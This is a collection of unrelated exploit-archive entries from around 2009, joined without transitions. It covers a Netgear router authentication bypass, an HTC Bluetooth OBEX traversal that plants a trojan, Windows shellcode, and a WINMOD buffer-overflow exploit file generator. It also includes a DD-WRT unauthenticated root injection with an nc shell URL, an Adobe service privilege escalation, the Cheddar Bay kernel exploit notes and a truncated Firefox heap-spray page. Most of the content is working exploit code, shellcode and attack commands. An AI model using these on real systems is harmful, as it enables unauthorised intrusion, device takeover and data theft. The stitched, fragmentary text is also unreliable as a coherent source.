Product Name: Netgear DG632 Router
Vendor: http://www.netgear.com
Date: 15 June, 2009
Author: tom@tomneaves.co.uk < tom@tomneaves.co.uk >
Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Authentication_Bypass.txt
Discovered: 18 November, 2006
Disclosed: 15 June, 2009

I. DESCRIPTION

The Netgear DG632 router has a web interface which runs on port 80. 
This allows an admin to login and administer the device's settings. 
Authentication of this web interface is handled by a script called
"webcm" residing in "/cgi-bin/" which redirects to the relevant pages
depending on successful user authentication. Vulnerabilities in this
interface enable an attacker to access files and data without
authentication.

II. DETAILS

The "webcm" script handles user authentication and attempts to load
"indextop.htm" (via javascript below).  The "indextop.htm" page requires
authentication (HTTP Basic Authorization).

---

<script language="javascript" type="text/javascript">
function loadnext() {
//document.forms[0].target.value="top";
document.forms[0].submit();
//top.location.href="../cgi-bin/webcm?nextpage=../html/indextop.htm";
}</script></head>
<body bgcolor="#ffffff" onload="loadnext()" >

Loading file ...
<form method="POST" action="../cgi-bin/webcm" id="uiPostForm">
<input type="hidden" name="nextpage" value="../html/indextop.htm" id="uiGetNext">
</form>

---

If a valid password to the default "admin" user is supplied, the script
then continues to load the "indextop.htm" page and continues to load the
other frames based on a hidden field.  If user authentication is
unsuccessful, the user is returned back to "../cgi-bin/webcm".  It is
possible to bypass the "webcm" script and access specific files directly
without the need for authentication.

Normal use:
http://TARGET_IP/cgi-bin/webcm?nextpage=../html/stattbl.htm

This would ask for the user to authenticate and would refuse access to
this file if authentication details were not known.  All the script is
doing is making sure authentication is forced upon the user.  The same
"stattbl.htm" file can be accessed without having to provide any
authentication using the following URL:

http://TARGET_IP/html/stattbl.htm

Another example:
http://192.168.0.1/cgi-bin/webcm?nextpage=../html/modemmenu.htm  
(returns 401 - Forbidden)

Bypassing the "webcm" script:
http://192.168.0.1/html/modemmenu.htm
(returns 200 - OK)

In the example above (modemmenu.htm), the full source can be viewed
which discloses further directories and files within the javascript of
the page. A sample of files disclosed within modemmenu.htm and available
to download are:

/html/onload.htm
/html/form.css
/gateway/commands/saveconfig.html
/html/utility.js (full source)

There are many other files that are accessible by calling them directly
instead of going via the "webcm" script, the above are just a sample. In
addition, it is possible to specify paths to the "webcm" script as shown
below:

http://TARGET_IP/cgi-bin/webcm?nextpage=../../

This allows an attacker to enumerate what files and directories exist
within the www root directory and beyond by using 200, 403 and 404
errors as a guide.

Affected Versions: Firmware V3.4.0_ap (others unknown)

III. VENDOR RESPONSE

12 June, 2009 - Contacted vendor.
15 June, 2009 - Vendor responded.  Stated the DG632 is an end of life
product and is no longer supported in a production and development
sense, as such, there will be no further firmware releases to resolve
this issue.

IV. CREDIT

Discovered by Tom Neaves

I shall complete the information related to Bugtraq ID: 33359

Title: HTC / Windows Mobile OBEX FTP Service Directory Traversal 
Author: Alberto Moreno Tablado
Vendor: HTC
Vulnerable Products:
- HTC devices running Windows Mobile 6
- HTC devices running Windows Mobile 6.1
Non vulnerable products: 
- HTC devices running Windows Mobile 5.0
- Other vendors’ Windows Mobile devices
References: http://www.seguridadmobile.com/windows-mobile/windows-mobile-security/HTC-Windows-Mobile-OBEX-FTP-Service-Directory-Traversal.html

Summary:
HTC devices running Windows Mobile 6 and Windows Mobile 6.1 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and write or read arbitrary files, via a ../ in a pathname. This can be leveraged for code execution by writing to a Startup folder.

Description:
There exists a Directory Traversal vulnerability in the OBEX FTP Service in the Bluetooth Stack implemented in HTC devices running Windows Mobile 6 and Windows Mobile 6.1. The OBEX FTP server is located in \Windows\obexfile.dll. Microsoft states this is a 3rd party driver developed by HTC and installed on HTC devices running Windows Mobile, so the vulnerability only affects to this vendor specifically.

A remote attacker (who previously owned authentication and authorization rights) can use tools like ObexFTP or gnomevfs-ls from a Linux box to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks.

The only requirement is that the attacker must have authentication and authorization privileges over Bluetooth. Pairing up with the remote device should be enough to get it; however, more sophisticated attacks, such as sniffing the Bluetooth pairing, linkkey cracking and BD_ADDR address spoofing, can be used in order to avoid this. Devices must have Bluetooth enabled and File Sharing over Bluetooth service active when the attack is performed. In case the attacker succeeded in getting the proper privileges, further actions will be transparent to the user.

The scope of the Directory Traversal vulnerability allows the attacker to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks. This security flaw leads to browse folders located anywhere in the file system, download files contained in any folder as well as upload files to any folder.

A remote attacker who previously owned authentication and authorization rights over Bluetooth can perform three risky actions on the device:

1) Browse directories located out of the limits of the default shared folder

An attacker can discover the structure of the file system and access to any directory within it, including: 
- The flash hard drive
- The external storage card
- The internal mass storage memory, included in specific HTC devices

2) Download files without permission

An attacker can download sensitive files located anywhere in the file system, such as: 
- personal pictures and documents located in \My Documents or any other directory
- Contacts, Calendar & Tasks information located in \PIM.vol
- Temporary internet cache and cookies located in \Windows\Profiles\guest\
- emails located in \Windows\Messaging

gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -l "../../Windows/Messaging"
Browsing 00:17:83:02:BA:3C ...
Channel: 4
Connecting...done
Receiving "../../Windows/Messaging"... Sending ".."... Sending ".."... Sending "Windows"... done
<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
  <parent-folder name="Windows" />
  <folder name="Attachments" created="20090119T171318Z"/>
  <file name="6238002d81030102.mpb" created="20090119T173434Z" size="1521"/>
  <file name="6839002d81030102.mpb" created="20090119T171828Z" size="2659"/>
</folder-listing>
done
Disconnecting...done
gospel@gospel-shift:~/bluez$

3) Upload malicious files 

An attacker can replace third party or system executable files with malicious files as well as upload trojans to any place in the filesystem, such as \Windows\Startup and, therefore, shall be executed the next time Windows Mobile inits.

gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -c "../../Windows/Startup" -p trojan.exe
Browsing 00:17:83:02:BA:3C ...
Channel: 4
Connecting...done
Sending ".."... Sending ".."... Sending "Windows"... Sending "Startup"... done
Sending "trojan.exe"...\done
Disconnecting...done
gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -l "../../Windows/Startup"
Browsing 00:17:83:02:BA:3C ...
Channel: 4
Connecting...done
Receiving "../../Windows/Startup"... Sending ".."... Sending ".."... Sending "Windows"... done
<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
  <parent-folder name="Windows" />
  <file name="trojan.exe" created="20090122T121924Z" size="266168"/>
  <file name="poutlook.lnk" created="20061231T230022Z" size="14"/>
</folder-listing>
done
Disconnecting...done
gospel@gospel-shift:~/bluez$

About affected and non affected products:
The following HTC devices are affected by this vulnerability: 
- HTC devices running Windows Mobile 6 Professional
- HTC devices running Windows Mobile 6 Standard
- HTC devices running Windows Mobile 6.1 Professional 
- HTC devices running Windows Mobile 6.1 Standard

You can find a list of tested HTC devices proved to be vulnerable at http://www.seguridadmobile.com/windows-mobile/windows-mobile-security/HTC-Windows-Mobile-OBEX-FTP-Service-Directory-Traversal.html#AffectedProducts

HTC devices running Windows Mobile 5.0 are not affected because the OBEX FTP service is not implemented in that OS version.

Other vendors’ Windows Mobile devices are not affected either: ASUS, Samsung, LG, ...

Vendor Status:
The vulnerability was first disclosed on 2009/01/19 as a whole Microsoft Bluetooth Stack issue in Windows Mobile 6 Professional. Subsequent tests proved that several Windows Mobile 6 Standard and Windows Mobile 6.1 Professional devices were also vulnerable. Microsoft was contacted on 2009/01/22 and this information was not made public because last mobile phones manufactured were vulnerable.

Further investigations proved that the issue is in a 3rd party driver installed by HTC, this vulnerability only affects to HTC devices and other vendors’ Windows Mobile devices are not affected.

HTC Europe has been contacted since 2009/02/09 and provided with all the details concerning on the exploitation of the flaw. However, no patches are known to be released for this security flaw.

Workaround:
This vulnerability is a zero-day threat. This means that all devices shipped up to date (July 2009) may be vulnerable.

Wait for proper vendor response and updates.

Do not accept pairing nor connection requests from unknown sources. Delete old entries in the paired devices list.

Alberto

windows xp-sp3 beep and exitprocess shellcode
author Teo Manojlovic
contact teo.manojlovic@skole.hr

this shellcode is using API call "Beep" which is in kernel32.dll
adress of this API is 7C837A8Fh
adress of exitprocess is 7C81CAFAh

here is assembler code using Intel sintax and MASM32
-------------------- begin----------------
.386

.model flat, STDCALL

.data
 
 .code

start:

xor eax,eax

mov eax,7C837A8Fh ;putting address of beep call

push 200h ; frequency

push 200h ; lenght

call eax ; calling beep

xor eax,eax ; setting 0 to eax register

mov eax,7C81CAFAh ; putting address of exitprocess call

call eax ;calling exitprocess

end start

------------------------end-----------


if we disassemle this code with olly debugger we will get following



00401000 > $ 33C0           XOR EAX,EAX                              ; |
00401002   . B8 8F7A837C    MOV EAX,kernel32.Beep                    ; |
00401007   . 68 00040000    PUSH 400                                 ; |/Duration = 1024. ms
0040100C   . 68 00030000    PUSH 300                                 ; ||Frequency = 300 (768.)
00401011   . FFD0           CALL EAX                                 ; |\Beep
00401013   . 33C0           XOR EAX,EAX                              ; |
00401015   . B8 FACA817C    MOV EAX,kernel32.ExitProcess             ; |
0040101A   . FFD0           CALL EAX                                 ; \ExitProcess







and here is the shellcode

\x33\xC0\xB8\x8F\x7A\x83\x7C\x68\x00\x04\x00\x00\x68\x00\x03\x00\x00\xFF\xD0\x33\xC0\xB8\xFA\xCA\x81\x7C\xFF\xD0

/*
win32/xp sp2 (En) cmd.exe 23 bytes
Author : Mountassif Moad
A.K.A : Stack
Description : It's a 23 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 En

get the following if we disassemle this code compiled with olly debugger
 
00402000  > 8BEC             MOV EBP,ESP
00402002  . 68 65786520      PUSH 20657865
00402007  . 68 636D642E      PUSH 2E646D63
0040200C  . 8D45 F8          LEA EAX,DWORD PTR SS:[EBP-8]
0040200F  . 50               PUSH EAX
00402010  . B8 8D15867C      MOV EAX,kernel32.WinExec
00402015  . FFD0             CALL EAX
*/
#include <stdio.h>
unsigned char shellcode[] =
                        "\x8b\xec\x68\x65\x78\x65"
                        "\x20\x68\x63\x6d\x64\x2e"
                        "\x8d\x45\xf8\x50\xb8\x8D"
                        "\x15\x86\x7C\xff\xd0";
int main ()
{
int *ret;
ret=(int *)&ret+2;
printf("Shellcode Length is : %d\n",strlen(shellcode));
(*ret)=(int)shellcode;
return 0;
}

#!/usr/bin/python
#[*] Exploit     :      	WINMOD 1.4 (.lst) Universal Buffer Overflow Exploit (SEH)
#[*] Tested on :   		Xp sp2 fr
#[*] Original exploit :   	http://www.milw0rm.com/exploits/9221
#[*] By : 			Dz_Girl
#[*] Greets to : hisok4 (even if he doesn't know me) & all friends


# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c"
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45"
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66"
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f"
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59"
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a"
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44"
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77"
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a"
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b"
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57"
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f"
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73"
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39"
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45"
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45"
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41")

payload = "DZ"
payload += shellcode
payload += "\x41"*(2868-len(shellcode))
payload += "\xE9\xC7\xF4\xFF\xFF"
payload += "\x61"*5
payload += "\xEB\xF4\x41\x41"
payload += "\x1E\x2F\x40\x00"

try:
    out_file = open("exploit.lst","w")
    out_file.write(payload)
    out_file.close()
    print("\nExploit file created!\n")
except:
    print "Error"

This is a remote root vulnerability in DD-WRT's httpd server. The bug exists 
at the latest 24 sp1 version of the firmware.

 The problem is due to many bugs and bad software design decisions. Here is 
part of httpd.c:

859 	        if (containsstring(file, "cgi-bin")) {
860 	
861 	                auth_fail = 0;
862 	                if (!do_auth
863 	                    (conn_fp, auth_userid, auth_passwd, auth_realm,
864 	                     authorization, auth_check))
865 	                        auth_fail = 1;


......... (snip)............

899 	
900 	                }
901 	                exec = fopen("/tmp/exec.tmp", "wb");
902 	                fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method);
903 	                if (query)
904 	                        fprintf(exec, "/bin/sh %s/%s</tmp/exec.query\n",
905 	                                server_dir != NULL ? 
server_dir : "/www",file);
906 	                else
907 	                        fprintf(exec, "/%s/%s\n",
908 	                                server_dir != NULL ? server_dir : "/www", 
file);
909 	                fclose(exec);
910 	
911 	                if (query) {
912 	                        exec = fopen("/tmp/exec.query", "wb");
913 	                        fprintf(exec, "%s\n", query);

........................
Two issues there: 
1) No metacharacters handling
2) Command gets executed even without successful authentication.
You are not going to see any output if not authenticated though.
.......................

914 	                        free(query);
915 	                        fclose(exec);
916 	                }
917 	
918 	                system2("chmod 700 /tmp/exec.tmp");
919 	                system2("/tmp/exec.tmp>/tmp/shellout.asp");

........... (snip)..........

926 	                if (auth_fail == 1) {
927 	                        send_authenticate(auth_realm);
928 	                        auth_fail = 0;

------------

3) issue 3: httpd runs as root  :) 



Now let's sum up (1), (2) and (3). Any unauthenticated attacker that can 
connect to the management web interface can get easily root on the device via 
his browser with an URL like:

 http://routerIP/cgi-bin/;command_to_execute

There is a catch though: whitespaces break it. Anyway, they can be easily 
replaced with shell variable like $IFS. So, getting root shell at 5555/tcp 
becomes as easy as typing this in your browser's url bar:

http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh


Voila (pretty old-school, eheh). Here is some (poor) video demonstrating the 
problem:
http://www.youtube.com/watch?v=UhDcXCVFrvM


Fortunately, httpd by default does not listen on the outbound interface. 
However, this vulnerability can be exploited via a CSRF attack (the dd-wrt 
device's owner does not even need to have an authenticated session on the web 
UI which is bad, bad). However, a base authentication dialog will appear. In 
IE even this can be supressed, see this one:

http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/

Unlike the already documented CSRF vulnerability ( 
http://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated 
session. This means someone can even post some crafted [img] link on a forum 
and a dd-wrt router owner visiting the forum will get owned  :) 


A weird vulnerability you're unlikely to see in 2009  :)  Quite embarrassing I 
would say  :) 


Thanks krassyo at krassyo.info for his support  :)  


Leka vecher  :) 

Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges
by Nine:Situations:Group
site: http://retrogod.altervista.org/

description:
Adobe downloader used to download updates for Adobe applications.
Shipped with Acrobat Reader 9.x

vendor: Nos Microsystems

poc:

C:\>sc qc "getPlus(R) Helper"
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: getPlus(R) Helper
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : getPlus(R) Helper
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem

C:\>cacls "C:\Programmi\NOS\bin\getPlus_HelperSvc.exe"
C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F <-------------- [!!!]
                                           NT AUTHORITY\SYSTEM:F

The executable file is installed with improper permissions, with "full
control" for Builtin Users; a simple user can replace it with a binary of
choice.
At the next reboot it will run with SYSTEM privileges.

/* super fun 2.6.30+/RHEL5 2.6.18 local kernel exploit in /dev/net/tun
   A vulnerability which, when viewed at the source level, is unexploitable!
   But which, thanks to gcc optimizations, becomes exploitable :)
   Also, bypass of mmap_min_addr via SELinux vulnerability!
   (where having SELinux enabled actually increases your risk against a
    large class of kernel vulnerabilities)

   for 2.6.30 without SELinux enabled, compile with:
   cc -fPIC -fno-stack-protector -shared -o exploit.so exploit.c
   (on a 64bit system -m64 may be necessary to compile a 64bit .so)
   cc -o pwnkernel pwnkernel.c
   then just ./cheddar_bay.sh
   for 2.6.30 with SELinux enabled, compile with:
   cc -fno-stack-protector -o exploit exploit.c
   then just ./exploit

   for RHEL5 2.6.18 compile with:
   cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
   then just ./exploit

   Now on with the show...

   This exploit looks like something I know, something I wrote loooong ago
   in a place... called Cheddar Bay
   the year was 2007, POGS were just rising in the fad section
   I believe you could talk about Friends, it was a viable conversation 
   topic back then
   And back then I had an exploit too, ohhh and what an exploit she was!

   exploiting the 'unexploitable' -- null ptr dereference directly to
   arbitrary code execution, and disabling SELinux & LSM atomically
   the first exploit of its kind!

   2 years later, some code has shifted around, 3 (or 4 depending on how 
   you count) vulnerabilities found in the mainline null ptr dereference 
   protection (added in reaction to the embarrassment from my exploit, 
   not from any proactive initiative), silently-fixing vulnerabilities 
   has become standard operating procedure among the kernel developers, 
   confusing even their own ranks as to what needs to be backported to 
   distro kernels or the stable tree.  So with all this great progress 
   in Linux security, what do I present now 2 years later?

   ********************************************************************
   Bypassing the null ptr dereference protection in the mainline kernel
   via two methods ->
     if SELinux is enabled, it allows pulseaudio to map at 0
     UPDATE: not just that, SELinux lets any user in unconfined_t map at
     0, overriding the mmap_min_addr restriction!  pulseaudio is not
     needed at all!  Having SELinux enabled actually *WEAKENS* system
     security for these kinds of exploits!
     if SELinux is disabled, use personality SVR4 to auto-map at 0 
   Turning a vulnerability which is unexploitable from a review of 
   the source code, where only trojan data can be supplied to a
   structure where no function pointers are called into an arbitrary OR 
   of 0x1 on any byte in memory
   Turning this arbitrary OR into arbitrary code execution by ORing
   an unused file_op on the device we're exploiting
   Abusing this arbitrary code execution to:
	* Disable auditing
	* Disable SELinux
	* Disable AppArmor
	* Disable LSM
	* Make userspace believe SELinux remains in enforcing mode
	* Give ourselves full privileges and capabilities
	* Appropriately increment refcnts so as to be
	* 100% reliable and repeatable
    Whilst providing an entertaining tale of the curse of Cheddar Bay!

    Discovery time of bug in public: 	7/6/09
    Began working on exploit:		7/9/09 6:00PM
    Completed exploit:			7/9/09 8:00PM
    Began port to 64bit:		7/11/09 11:00AM
    Completed port to 64bit:    	7/11/09 12:00PM
    Began port to RHEL5 2.6.18-157:	7/12/09 12:00PM
    Completed port to RHEL5 2.6.18-157:	7/12/09 12:30PM
    Rest of time was spent adding an incredible visual and audio experience

    Greets to Julien Tinnes & Tavis Ormandy for the null ptr dereference
    protection bypass (of which there are more ;) ) 5th time's the charm? :)
    also of course to pipacs for helpful ideas and for pointing out the
    fix for this bug that screamed of suspiciousness ;)
    also to cloud for the wonderful crab
    also to #social for being social
    and to emoflip (under duress so he doesn't stab me next month)

    to xorl.wordpress.com in the hopes that he reports more on silently 
    fixed Linux kernel vulnerabilities :)

    funtimeinternet for the curse of Cheddar Bay:
    http://www.youtube.com/watch?v=l--BvXpaGq4
    Be sure to check out the response videos (which funtimeinternet 
    called "AWESOME"):
    http://www.youtube.com/watch?v=UdkpJ13e6Z0
    http://www.youtube.com/watch?v=P7uyCMdAldM

    Finally to sgrakkyu for his two incredible exploits and nice email chats
    (and for making me realize the more interesting compiler issue here ;))
    http://kernelbof.blogspot.com
    disabling SELinux remotely with a single dword write is just classy ;)

    The commit that introduced the vulnerability (Feb 6th):
    http://mirror.celinuxforum.org/gitstat/commit-detail.php?commit=33dccbb050bbe35b88ca8cf1228dcf3e4d4b3554
    Though it was committed before the release of the 2.6.29 kernel, it 
    did not (thankfully) make it into the 2.6.29 kernel.  It first 
    appeared in 2.6.30.

    Crash appears on April 9th showing a null ptr dereference:
    http://article.gmane.org/gmane.linux.network/124939

    The buggy commit was backported to a RHEL5 test kernel on April 15th
    (the latest test kernel is still vulnerable and likely without this
    exploit being released, the code would have made it into the next
    RedHat kernel update)
    https://bugzilla.redhat.com/show_bug.cgi?id=495863

    Fix appears on July 6th:
    http://lkml.org/lkml/2009/7/6/19
    As you'll note in the fix, the problem was a NULL tun variable, 
    which from the source should have been unexploitable due to the 
    immediate check for !tun.  The dereference of tun to grab ->sk
    would have caused only a crash (or not, if NULL was mapped).  So how 
    was the bug exploitable before but fixed by moving one line of code?
    The reason is that because the tun ptr is used before the check for 
    !tun, the compiler assumes that in dereferencing tun a fault will 
    occur, removing any need to later check tun for being NULL.  So the 
    !tun check actually does not exist in the compiled code.  Normally 
    this would be fine, if you could actually ensure that nothing is 
    mapped at NULL, but as this (and previous exploits) have proven, 
    that's not the case :)  So the fix moves the dereference of tun 
    until after !tun is checked -- this time the !tun check actually 
    exists in the code and the vulnerability/exploitability is removed.
    You can see a reference to this sort of problem here:
    http://osdir.com/ml/gcc.cross-compiling.arm/2007-10/msg00003.html
    The kernel should be compiled with -fno-delete-null-pointer-checks
    to remove the possibility of these kinds of vulnerabilities 
    turning exploitable in the future which would be impossible to spot 
    at the source level without this knowledge.

    As of the writing of this, the above fix exists for this vulnerability,
    but it's unlikely to make it into any -stable release (at least, 
    not until after this exploit is released) because as we say in 
    Linux kernel development circles, there are no vulnerabilities, just 
    DoS bugs and silent fixes.  When noone seems to care to classify 
    bugs properly or put any real effort into determining the impact of a 
    vulnerability (leading to everything being called DoSes with no 
    justification), then even the maintainers don't know what should be 
    included in the "stable" kernels, leaving users vulnerable and 
    attackers with beautiful, 100% reliable vulnerabilities like this 
    one to exploit.

    It's at these times that I take comfort in the words of security 
    expert Linus Torvalds, who steers the good ship Linux into safer 
    seas.  As we read at http://article.gmane.org/gmane.linux.kernel/848718
    he's been blessed with the foresight to claim that "we could 
    probably drop PAE some day," calling upon his own insight that "I'd 
    also not ever enable it on any machine I have.  PAE does add 
    overhead, and the NX bit isn't _that_ important to me."

    ****** UPDATE! 07/11/09 *******

    A man riding on horseback has delivered some news, my 
    congratulations to the members of vendor-sec for their excellent 
    analysis of my first exploit video, much in the same vein as their 
    analyses of vulnerabilities in the kernel.  Watch the masters hone 
    their craft:

    Vincent Danen:
    "Possibly, or another issue we've been discussing on vendor-sec, which
     would mean the problem is two fold; a problem with a setuid app and 
     a problem with SELinux (or, more probably, defined rules).

     He throws AppArmor and LSM in there as well as being faulty, but I 
     think that might be incorrect (let's remember spender's grsec 
     agenda) -- you would have to see if there are rules specifically for
     preventing this kind of thing in order to know if the fault is in 
     the rules or in the kernel itself."

    sometime later..

    "Yeah, just saw Marc's post and looked at the blog entry.  The 
     coincidence with the pulseaudio issue we were looking at seemed 
     odd, considering certain history with info on vendor-sec being 
     disclosed by spender."

    Linus Torvalds:
    "That does not look like a kernel problem to me at all.
     He's running a setuid program that allows the user to specify its 
     own modules.  And then you people are surprised he gets local root?"

    sometime later after video #3 (where I show RHEL5 getting owned)...

    Willy Tarreau (who is actually a nice guy, just stuck between a 
    rock and a hard place at times considering the people he has to 
    cooperate with, also I appreciate his continued work on 2.4):
    "He shows minor parts of his exploit code (only a few comments in fact)
     with one part half-hidden saying "the NX bit isn't _that_ important 
     to me". I don't think that will ring a bell to anyone :-/"

    and then:

    "He claims he exploits a flaw in SELinux and doesn't require pulseaudio.
     Maybe some recent SELinux fixes got backported into that kernel, 
     which might help narrow the issue down to less code ?"

    followed by:

    "Well, I see a positive note on all of that : the mmap_min_addr is 
     really efficient at limiting null pointer abuse ; the guys now have 
     to find a weak setuid program in order to deref null pointers. Of 
     course that does not mean anything particularly good for our 
     drivers (or whatever derefs a null pointer), but it means that 
     kernel is already really good at protecting itself.

     I've just checked the grsec site (http://www.grsecurity.net/) and 
     did not see any patch for 2.6.30. However, a patch was released 
     yesterday for 2.6.29.6 (but I don't have the previous one to diff 
     against). So maybe the null deref he's apparently exploiting is 
     also present in 2.6.29. It is highly possible that the issue is 
     fixed or worked around in his latest patch so that he can show his 
     kernels are not affected.

     I've just checked the latest patch, and except for a few minor 
     fixes in acpi, doc2001 and relay.c which don't look really suspect, 
     I see nothing obvious. So maybe it's 100% 2.6.30-specific and he 
     still has no fix for it in his patches :-/"

    Markus Meissner:
    "If someone has time he could decode the "Resolved <removed for vid> 
     to 0xfffff" offsets to a ubuntu 64bit kernel. :/"

    So much sadness! And it's funny, none of them emailed me to ask 
    anything.  Probably because they choose to operate in secrecy, 
    depending upon the spies (it's not cool or ethical to spy, guys :P)
    they have in some public channels I frequent (which is the only way 
    they found out about the videos -- I hadn't posted links to them 
    anywhere else).  I'm amazed they come to the conclusions they came 
    to, as if I didn't just release a very similar exploit in 2007 that 
    attacked the *kernel* via a *null ptr dereference* and then 
    *disabled SELinux & LSM*.  The fact that pulseaudio was used and 
    was discussed publicly in Julien's blog regarding its use for 
    bypassing mmap_min_addr "protection" surely didn't ring any bells.  
    The fact that I'm throwing around kernel addresses and suggesting 
    that at least one of the addresses is being written to clearly 
    shows this is not a kernel problem at all -- good call Linus.  I'm 
    glad this arm-chair security expert discussion goes on in private; 
    it'd be pretty embarrassing if it were public :)

    "I think a little public shaming might not be a bad idea"
		- Linus Torvalds (http://lkml.org/lkml/2007/6/19/256)

    "I really _despise_ people who think security is an issue of hiding 
     bugs.  If they then try to make themselves look good ("no zero-day 
     exploit, we fixed it immediately"), they're worse than low.

     The only thing that seems to work for security is public shaming.

     And yeah, I get personally embarrassed by some of the things we've 
     had too, and some of that public shaming from the bug can well fall 
     on me.  I've had cases where I've simply _forgotten_ about some bug 
     that was reported to me, or more commpnly [sic] just overlooked it. 
     Shame on me.  That's ok."
		-Linus Torvalds (circa 2006)

    PS (to vendorsec, etc): though you will never thank me (or sgrakkyu, 
    or Julien), you're welcome for all this free security research, 
    which could have been sold in private instead.  The industry isn't 
    what it was like in 2000, people don't publish things anymore: they 
    make money off them.  Not seeing exploits published doesn't mean 
    you're doing a good job anymore.  Have you noticed that the 
    complex exploits that have been released are released unpossibly 
    quickly after the vulnerability is finally fixed?  There's a reason 
    for that.  If the vulnerable code in this case had happened to have 
    gone into the 2.6.29 kernel instead of 2.6.30 (which won't be used 
    for vendor kernels) I likely wouldn't have published.  I have no 
    use for exploits, but a good laugh is only worth so much.  My 
    suggestion to you is to hire a couple of sgrakkyus or Juliens 
    instead of old guys who have never written an exploit, since other 
    than Stealth, I don't know of anyone skilled in the industry that 
    you actually employ.  A second suggestion: as you are companies 
    promoting open source, free software, it would be nice if the 
    justifications for your vulnerability classifications were more 
    transparent (or made available at all).  The old game of calling 
    everything for which a public exploit doesn't exist a DoS for no 
    reason is getting very tired, and it's not fooling anyone. Third, 
    the official policy of intentionally omitting security relevant 
    information in modifications to the Linux codebase is a disgrace 
    and a disservice to yourselves, to other vendors, and to your 
    customers. It demonstrates a lack of integrity and trust in your 
    own products, though I know you have no intention of changing this 
    policy as you're currently enjoying a reputation for security that 
    is ill-gotten and has no basis in reality.  Truthfully representing 
    the seriousness of vulnerabilities in your software would tarnish 
    that image, and that's not good for business.  You're praised when 
    you cover things up, and yet Microsoft is the one with the bad 
    reputation.  If you were to follow the suggestions above, then 
    maybe your security wouldn't be the laughing stock of the industry.

    Play these jokers out, keyboard cat --
    http://www.youtube.com/watch?v=J---aiyznGQ
*/

http://grsecurity.net/~spender/cheddar_bay.tgz

backup: http://milw0rm.com/sploits/2009-cheddar_bay.tgz

<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Vulnerabilty
</br>
Author: SBerry aka Simon Berry-Byrne
</br>
Thanks to HD Moore for the insight and Metasploit for the payload
<div id="content">
<p>
<FONT>                             
</FONT>
</p>
<p>
<FONT>Loremipsumdoloregkuw</FONT></p>
<p>
<FONT>Loremipsumdoloregkuwiert</FONT>
</p>
<p>
<FONT>Loremikdkw  </FONT>
</p>
</div>
<script language=Javascript>
 
/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +   
                       "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +   
                       "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +   
